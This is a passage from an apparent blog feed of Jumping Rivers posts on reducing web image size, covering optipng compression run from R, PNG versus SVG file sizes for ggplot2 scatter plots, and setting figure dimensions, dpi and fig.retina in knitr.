utility. For graphs, a reduction of around 50% isn&amp;rsquo;t unusual.
Running &lt;code&gt;optipng&lt;/code&gt; takes around one to two seconds per image, so isn&amp;rsquo;t really suitable
for dynamic, i.e. Shiny based applications. However, for generating images that will never change, e.g. blog posts, then an extra second or two is not an issue.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve already created a bunch of images, then a simple R script can
easily optimise all files&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;png_files &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;*\\.png$&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; full.names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; (png &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; png_files) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;system2&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;optipng&amp;#34;&lt;/span&gt;, png)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;optipng&lt;/code&gt; function has a compression argument, that allows you to improve the PNG
compression, e.g.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;system2&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;optipng&amp;#34;&lt;/span&gt;, args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;-o1&amp;#34;&lt;/span&gt;, png))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The argument &lt;code&gt;-o&lt;/code&gt; selects the level of compression. The higher the number, the hard &lt;code&gt;optipng&lt;/code&gt; tries
to compress. To be honest, I&amp;rsquo;ve found leaving the compression level at the default level to be
more than significant. Life is too short to worry about the odd byte.&lt;/p&gt;
&lt;h3 id="scalable-vector-graphics-svgs"&gt;Scalable Vector Graphics (SVGs)&lt;/h3&gt;
&lt;p&gt;A Scalable Vector Graphics file (SVG) uses an XML-based format to precisely
describe how the image should appear. Since the graph is described using text,
an SVG can be scaled to different sizes without losing quality, i.e. we no longer
worry about resolution.&lt;/p&gt;
&lt;p&gt;This format is particularly appealing for figures, which are simply a combination of lines, texts and shapes. The downside is that file sizes can get prohibitively large. For example,
if you have a scatter plot with lots of points, each individual point will have it&amp;rsquo;s
own entry in the SVG file.&lt;/p&gt;
&lt;p&gt;To understand the trades a bit more, lets create multiple {ggplot2} scatter plots where
were gradually increase the number points&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;no_of_pts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5000&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10000&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;50000&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;100000&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; (i &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; no_of_pts) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;runif&lt;/span&gt;(i)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;runif&lt;/span&gt;(i)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x, y))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Save graphic using SVG, PNG, etc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first scatter plot (when &lt;code&gt;i = 1&lt;/code&gt;) only contains a single point, whereas the final scatter plot contains &lt;code&gt;i = 100000&lt;/code&gt; points, and is almost entirely black with points.
For each scatter plot, we generated&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a PNG version&lt;/li&gt;
&lt;li&gt;a PNG version, optimised using &lt;code&gt;optipng&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;a SVG graph.&lt;/li&gt;
&lt;/ul&gt;
&lt;img src="file-format-comparision-1.svg" title="Comparision of file sizes of different file formats." alt="Comparision of file sizes of different file formats." width="600px" style="display: block; margin: auto;" /&gt;
&lt;p&gt;The figure shows that the file size increases with the number of points. However, at around 10,000 pts, the PNGs
file size starts to decrease. This is because the plots are simply a black background. However,
the file sizes for SVGs increase in a predictably linear fashion. When plotting 200 pts,
the file size is starting to get prohibitive. At around 5,000 pts, the SVG file is over 1MB.&lt;/p&gt;
&lt;p&gt;As an aside, the JPEG file size is about the same as the PNG file size in this test.&lt;/p&gt;
&lt;h3 id="next-generation-formats"&gt;Next Generation Formats&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;ve ever used Google&amp;rsquo;s PageSpeed Insights, one of the recommendations is to
serve images in &lt;a href="https://web.dev/uses-webp-images/" rel="external"&gt;next-gen formats&lt;/a&gt;, such as JPEG 2000, JPEG XR, and WebP. However, a little investigation suggests this is overkill for the vast majority of sites.
As a significant numbers of browsers don&amp;rsquo;t yet support these formats, shaving off a few bytes
doesn&amp;rsquo;t seem worth the effort. Obviously if you have a top 100 site like Amazon or are serving
lots of images on a page, then it may/will be worth the hassle. For most sites using Hugo, shaving milliseconds off load time isn&amp;rsquo;t required.&lt;/p&gt;
&lt;h3 id="conclusion"&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Spending a little time optimising file size brings lots of benefits&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;your web-pages load faster&lt;/li&gt;
&lt;li&gt;your documents are smaller&lt;/li&gt;
&lt;li&gt;your gitlab repo clones quicker and takes up less storage&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Typically, I don&amp;rsquo;t care about optimising to the nearest byte, but a combination of choosing
the &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;correct dimensions&lt;/a&gt;
and the correct image type, gives you something close to optimal with little thought.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Image sizes in an R markdown Document</title><link>https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/</link><pubDate>Mon, 15 Feb 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our four part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Specifying the &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;correct figure dimension&lt;/a&gt; in {knitr} (this post).&lt;/li&gt;
&lt;li&gt;Part 2: What &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;image format&lt;/a&gt; should you use for graphics.&lt;/li&gt;
&lt;li&gt;Part 3: Including &lt;a href="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/" rel="external"&gt;external graphics&lt;/a&gt; in your document.&lt;/li&gt;
&lt;li&gt;Part 4: Setting default {knitr} &lt;a href="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/" rel="external"&gt;options&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; we recently moved our website from
WordPress to &lt;a href="https://gohugo.io/" rel="external"&gt;Hugo&lt;/a&gt;.
The main reason for the move was that since the team are all very comfortable with Git,
continuous integration and continuous development
using a static web-site generator made more sense than WordPress. Additional benefits
are decreasing the page loading time speed and general site security - WordPress sites are notorious for
getting hacked if not kept up to date.&lt;/p&gt;
&lt;p&gt;While thinking about WordPress brings a host of painful memories,
one of the benefits was it does (sort of) hide the pain of optimising images for web-pages.
There are numerous WordPress plugins that manipulate, cache and optimise the delivery
of your graphics. Of course, this is also a potential security problem, but that&amp;rsquo;s another story.
When we ported over our pages, we noticed that the graphics on &lt;a href="https://www.jumpingrivers.com/blog/" rel="external"&gt;blog&lt;/a&gt; posts and
&lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course descriptions&lt;/a&gt; were all slightly different.
The images had different resolutions, file formats and dimensions.
While they all looked OK, they certainly weren&amp;rsquo;t standardised or optimised!&lt;/p&gt;
&lt;p&gt;In this series of posts we&amp;rsquo;ll consider the (simple?) task of generating and including figures
for the web using R &amp;amp; {knitr}. Originally this was going to be a single post,
but as the length increase, we&amp;rsquo;ve decided to separate it into a separate articles.
The four posts we intend to cover are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;setting the image size (this post)&lt;/li&gt;
&lt;li&gt;selecting the image type, PNG vs JPEG vs SVG&lt;/li&gt;
&lt;li&gt;including non-generated files in a document&lt;/li&gt;
&lt;li&gt;setting global {knitr} options.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Before we go further, these series of articles are all aimed at web documents.
How we handle PDFs is slightly different and will be covered at a different time.
Also, I&amp;rsquo;m trying optimise images for the web, but at the same time, I&amp;rsquo;m not going to
chase down every last byte to shave off a milli-second on page-speeds.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s also worth reading our previous post on generating &lt;a href="https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/" rel="external"&gt;consistent graphs&lt;/a&gt; in R across different
operating systems.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-knitr-rmarkdown-image-size"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="what-makes-figures-special"&gt;What Makes Figures Special&lt;/h2&gt;
&lt;p&gt;There&amp;rsquo;s lots of information on the web on how to optimise images for websites.
Figures like line graphs, scatter plots and histograms, have to be handled
a little differently than pictures. Graphs have a few distinctive characteristics.&lt;/p&gt;
&lt;p&gt;As they usually contain text, this means we have to pay specific attention to
image quality. Also, while we can resize a photograph easily, resizing a graph with
text may make the axis unreadable.
Furthermore, images contain thin lines and perhaps use opacity within the plot.&lt;/p&gt;
&lt;p&gt;The core problem we are trying to solve is when we create a web page (a HTML file),
the page gives a containing box with a certain width and height.
We want to create a figure that matches these dimensions.&lt;/p&gt;
&lt;p&gt;If the figure we create is too large for the box, the browser (or some clever server-side plugin) will resize your image. This has two downsides&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;if the client downloads the image, this will increase your page loading speed&lt;/li&gt;
&lt;li&gt;if the figure contains text, then the text will become smaller&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If the figure is smaller than the box, then your figure will look pixelated and the text
may become unreadable.&lt;/p&gt;
&lt;h3 id="the-dpi-issue"&gt;The DPI issue&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;ve ever Googled web-graphics before, you will have come across DPI or dots per inch.
The typical recommendation for web-graphics is 72dpi. However, this is completely the &lt;a href="https://daraskolnick.com/image-dpi-web/" rel="external"&gt;wrong&lt;/a&gt; way of thinking about it.
When you put a graphic/image on a website, you have a set number of pixels.
This is the unit of measurement you need to consider when generating a graphic.
If you are generating a graph for a PDF, then DPI is important as you can cram more points
in a space. However, on a monitor you have pixels.&lt;/p&gt;
&lt;p&gt;If your web-designer tells you to provide a 600px by 600px image - that&amp;rsquo;s what they need. DPI
doesn&amp;rsquo;t actually come into this calculation!&lt;/p&gt;
&lt;p&gt;The one caveat to the above (as we&amp;rsquo;ll see) is that dpi alters the text size when creating
R images.&lt;/p&gt;
&lt;h3 id="setting-image-dimensions"&gt;Setting image dimensions&lt;/h3&gt;
&lt;p&gt;If you are creating graphics using the &lt;code&gt;png()&lt;/code&gt; function (or a similar graphics device),
then you simply need to specify the dimensions using the &lt;code&gt;width&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt;
arguments. As an example, let&amp;rsquo;s create a simple {ggplot2} scatter plot&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(dd, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x, y)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which we then save with dimensions of 400px by 400px:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;png&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1-400.png&amp;#34;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo-png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dev.off&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This creates a perfectly sized 400px by 400px image&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# As we&amp;#39;ll see below, we may have to double this resolution&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# for retina displays&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dim&lt;/span&gt;(png&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;readPNG&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1-400.png&amp;#34;&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 400 400&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When we include the scatter plot&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1-400.png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="figure1-400.png" width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;it comes out at the perfect size and resolution.&lt;/p&gt;
&lt;h2 id="the-graphics-goldilocks-principle"&gt;The graphics Goldilocks principle&lt;/h2&gt;
&lt;p&gt;Suppose we create images that aren&amp;rsquo;t the correct size for the HTML container.
Is it really that bad? If we create an image double the size, 800px by 800px,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;png&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1-800.png&amp;#34;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt;, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo-png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dev.off&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and try and squeeze it into a 400px box. The font
size becomes tiny.
The &amp;ldquo;quality&amp;rdquo; of the figure is fine, it&amp;rsquo;s just unreadable.&lt;/p&gt;
&lt;img src="figure1-800.png" width="800" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;If we create an image that is only 200px, and then expanded it to fit the 400px container box,
the text becomes too large and the graph is fuzzy.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;png&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1-200.png&amp;#34;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo-png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dev.off&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="figure1-200.png" width="200" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Instead, we need something not too big, not too small. But something that &lt;em&gt;just&lt;/em&gt; fits.&lt;/p&gt;
&lt;h2 id="setting-sizes-in-knitr"&gt;Setting sizes in {knitr}&lt;/h2&gt;
&lt;p&gt;At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;, most of the
time we create graphs for HTML pages it&amp;rsquo;s performed within an
R markdown document via {knitr}. Above, we created images
by specifying the exact number of pixels. However in {knitr}
you can&amp;rsquo;t specify the number of pixels when creating the image,
instead you set the figure dimensions and also the output dimensions.
The image units are
&lt;a href="https://github.com/yihui/knitr/blob/479eba89314984930f3dd336fd3d929bf2909e91/R/plot.R#L61" rel="external"&gt;hard-coded&lt;/a&gt; as inches
within {knitr}.&lt;/p&gt;
&lt;p&gt;The dimensions of the image are calculated via &lt;code&gt;fig.height * dpi&lt;/code&gt; and &lt;code&gt;fig.width * dpi&lt;/code&gt;.
The &lt;code&gt;fig.retina&lt;/code&gt; argument also comes into play, but we&amp;rsquo;ll set &lt;code&gt;fig.retina = 1&lt;/code&gt;, which will match above, then come back to this idea at the end.&lt;/p&gt;
&lt;p&gt;If we want to create an image with dimensions &lt;code&gt;d1&lt;/code&gt; and &lt;code&gt;d2&lt;/code&gt;, then we set the {knitr} chunks to&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;fig.width = d1 / 72&lt;/code&gt;,&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.width = d2 / 72&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dpi = 72&lt;/code&gt; - the default&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.retina = 1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dev.args = list(type = &amp;quot;cairo-png&amp;quot;)&lt;/code&gt; - not actually needed, but you &lt;a href="https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/" rel="external"&gt;should&lt;/a&gt; set it!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In theory, you should be able to set &lt;code&gt;dpi&lt;/code&gt; to anything and get the same image, but the &lt;code&gt;dpi&lt;/code&gt; value
is passed to the &lt;code&gt;res&lt;/code&gt; argument in &lt;code&gt;png()&lt;/code&gt;, and that controls the text scaling.
So changing &lt;code&gt;dpi&lt;/code&gt; means your text changes.
In practice, leave &lt;code&gt;dpi&lt;/code&gt; at the default value.
If you want to change the your text size, then change them in your plot.&lt;/p&gt;
&lt;h2 id="but-what-about-outwidth-and-outheight"&gt;But what about out.width and out.height?&lt;/h2&gt;
&lt;p&gt;The {knitr} arguments &lt;code&gt;out.width&lt;/code&gt; and &lt;code&gt;out.height&lt;/code&gt; &lt;strong&gt;don&amp;rsquo;t&lt;/strong&gt; change the dimensions of the &lt;code&gt;png&lt;/code&gt;
created. Instead, they control the size of the HTML container on the web-page. As we seen
above, we want the container size to match the image size. By default this should happen,
but you can specify the sizes explicitly &lt;code&gt;out.width = &amp;quot;400px&amp;quot;&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="but-what-about-figretina"&gt;But what about fig.retina?&lt;/h2&gt;
&lt;p&gt;When &lt;code&gt;fig.retina&lt;/code&gt; is set to 2, the &lt;code&gt;dpi&lt;/code&gt; is doubled, but the display sized is halved.
The practical result of this is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;file sizes increase, so page loading also increases&lt;/li&gt;
&lt;li&gt;anyone with a retina display will see a crisper graph&lt;/li&gt;
&lt;li&gt;if someone zooms into the plot on the browser, the graph should still look nice even at
200% magnification.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The defaults for &lt;code&gt;fig.retina&lt;/code&gt; differ between {rmarkdown} and {knitr}. So rather than
trying to figure it out, set it explicitly at the top of the document via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Or 1 if you want&lt;/span&gt;
